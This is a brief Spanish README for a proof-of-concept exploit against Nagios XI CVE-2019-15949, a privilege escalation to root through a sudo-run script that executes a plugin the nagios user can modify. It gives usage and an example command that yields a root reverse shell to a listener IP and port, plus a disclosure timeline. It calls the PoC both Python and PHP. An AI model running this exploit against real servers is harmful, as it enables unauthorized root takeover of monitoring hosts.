
un PoC para la RCE de Nagios CVE-2019-15949 en Python
un PoC en Python para el CVE-2019-15949
Existe una vulnerabilidad en Nagios XI <= 5.6.5 que permite a un atacante aprovechar un RCE para escalar privilegios a root. El exploit requiere acceso al servidor como el usuario 'nagios', o acceso CCM a través de la interfaz web con permisos para gestionar plugins.
El script getprofile.sh, invocado al descargar un perfil del sistema (profile.php?cmd=download), se ejecuta como root mediante una entrada sudo sin contraseña; el script ejecuta el ejecutable ‘check_plugin’, que pertenece al usuario nagios. Un usuario con sesión iniciada en Nagios XI con permisos para modificar plugins, o el usuario 'nagios' en el servidor, puede modificar el ejecutable ‘check_plugin’ e insertar comandos maliciosos ejecutables como root.
Se ha desarrollado un PoC en PHP que sube un payload que resulta en una shell inversa como root. Uso:
python3 exploit.py tagetIp [ssl=false/true] username password Lhost lport
ejemplo:
python3 exploit.py 10.10.11.9 false nagiosadmin admin 10.10.11.14 4444
Reportado a Nagios el: 29 de julio de 2019 Confirmado por Nagios el: 29 de julio de 2019 Corregido en la versión: 5.6.6 el: 20 de agosto de 2019 CVE asignado el: 6 de septiembre de 2019 (CVE-2019-15949 https://nvd.nist.gov/vuln/detail/CVE-2019-15949)